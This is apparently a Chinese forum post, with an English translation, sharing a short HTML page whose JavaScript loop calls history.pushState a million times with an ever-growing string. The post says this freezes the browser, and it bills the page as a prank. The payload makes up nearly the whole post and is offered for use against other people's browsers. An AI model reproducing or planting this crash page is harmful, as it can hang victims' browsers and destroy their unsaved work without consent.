[PHP编程] 这十二行代码是如何让浏览器卡死?(可以整蛊)

[复制链接]
发表于 2023-1-5 14:20:59
完整HTML代码如下:


<html><body><script>var total="";for (var i=0;i<1000000;i++){    total= total+i.toString();    history.pushState(0,0,total);}</script></body></html>
demo:(温馨提示:请保存浏览器其它窗口的编辑任务)

(The complete HTML code is as follows:


<html><body><script>var total="";for (var i=0;i<1000000;i++){ total= total+i.toString(); history.pushState(0,0,total); }</script></body></html>
demo: (reminder: please save the editing tasks in other windows of the browser))





上一篇:Myzly二级域名分配系统 v3.0
下一篇:二级域名分配2.1源码及免费二级域名分享

使用道具 举报

Archiver|手机版|小黑屋|吾爱开源 |网站地图

Copyright 2011 - 2012 Lnqq.NET.All Rights Reserved( ICP备案粤ICP备14042591号-1粤ICP14042591号 )

关于本站 - 版权申明 - 侵删联系 - Ln Studio! - 广告联系

本站资源来自互联网,仅供用户测试使用,相关版权归原作者所有

快速回复 返回顶部 返回列表